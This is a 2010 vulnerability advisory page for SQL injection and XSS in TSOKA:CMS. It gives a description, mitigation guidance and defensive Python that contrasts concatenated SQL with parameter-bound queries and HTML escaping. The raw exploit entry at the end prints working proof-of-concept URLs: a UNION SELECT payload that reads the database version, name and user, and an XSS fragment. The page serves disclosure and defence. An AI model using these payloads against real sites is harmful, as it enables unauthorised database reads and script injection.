Vendor: TSOKA:CMS
By: d3v1l [Avram Marius]
CVSS: 8.8 (HIGH)
Type: SQL Injection & XSS
CWE: 89, 79
Product Name: TSOKA:CMS
Affected Version From: 1.1
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:tsoka:tsoka:cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

TSOKA:CMS v1.1, v1.9 and v2.0 SQL Injection & XSS Vulnerability

TSOKA:CMS versions 1.1, 1.9 and 2.0 are vulnerable to SQL injection and cross-site scripting (XSS). Both flaws sit in the id parameter of the articolo page (?pag=articolo&id=), whose value is used unsanitized in a database query and reflected into the rendered page. A crafted HTTP request can therefore run attacker-controlled SQL against the underlying database (the published proof of concept reads the database version, name and user via UNION SELECT) and inject script into the page served to other users.

Mitigation:

Developers should validate user-supplied input before it reaches a SQL query (an article id, for example, should be accepted only as an integer) and should pass values to the database as query parameters rather than concatenating them into SQL text. Additionally, all output reflected into HTML should be encoded for the context in which it is rendered before being returned to the user.
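As an added illustration of that mitigation (example code written for this page, not code from TSOKA:CMS; the sqlite3 backing store, the articles/users tables and the sample rows are constructed assumptions), the following Python contrasts the concatenation pattern behind an id=-style injection with a validated, parameter-bound lookup, and shows HTML-escaping of a value that is reflected back into the page:

```python
import html
import re
import sqlite3


def build_db():
    """Constructed in-memory stand-in for a CMS database (not the TSOKA:CMS schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pwhash TEXT)")
    conn.executemany(
        "INSERT INTO articles VALUES (?, ?, ?)",
        [(1, "Hello", "First post"), (2, "World", "Second post")],
    )
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-hash')")
    return conn


def fetch_article_vulnerable(conn, raw_id):
    """The bug pattern: the request parameter is spliced into the SQL text.

    Whatever the client sends becomes part of the statement, so a lookup of one
    article can be turned into a read of any other table in the database.
    """
    sql = "SELECT id, title, body FROM articles WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def is_valid_article_id(raw_id):
    """Validation rule: an article id is a plain decimal integer, nothing else."""
    return re.fullmatch(r"[0-9]{1,9}", raw_id) is not None


def fetch_article_safe(conn, raw_id):
    """Validated and parameter-bound lookup.

    1. Validate: reject anything that is not a decimal integer before it gets
       near the database.
    2. Bind: pass the value as a query parameter, so the driver never interprets
       it as SQL text; UNION keywords and comment sequences are just characters.
    """
    if not is_valid_article_id(raw_id):
        raise ValueError("article id must be a decimal integer")
    return conn.execute(
        "SELECT id, title, body FROM articles WHERE id=?", (int(raw_id),)
    ).fetchall()


def escape_for_html(value):
    """Output encoding: a value reflected into HTML is escaped for the text and
    attribute contexts, so a '">' or a <script> tag is displayed, not executed."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    db = build_db()
    print(fetch_article_safe(db, "1"))
    print("<h1>" + escape_for_html('"><script>alert(1)</script>') + "</h1>")
```

The validation step alone would stop the proof-of-concept payloads, but parameter binding is the control that holds even when a value legitimately has to be free text (a search string, a title), so both belong in the fix.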

Exploit-DB raw data:

[~]-----------------------------------------------------------------------------------------------------------------------
[~] TSOKA:CMS v1.1 , v1.9 AND v2.0 SQL Injection & XSS Vulnerability
[~]
[~] http://www.alanzard.com (from Italy)
[~]
[~]
[~] ----------------------------------------------------------------------------------------------------------------------
[~] Bug found by d3v1l [Avram Marius]
[~]
[~] Date: 28.03.2010
[~]
[~]
[~] http://security-sh3ll.blogspot.com
[~]
[~] ----------------------------------------------------------------------------------------------------------------------
[~] articolo&id= SQL & XSS
[~]
[~]
[~] Ex -
[~]
[~] http://[site]/?pag=articolo&id=">
[~] http://[site]/?pag=articolo&id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8--
[~]------------------------------------------------------------------------------------------------------------------------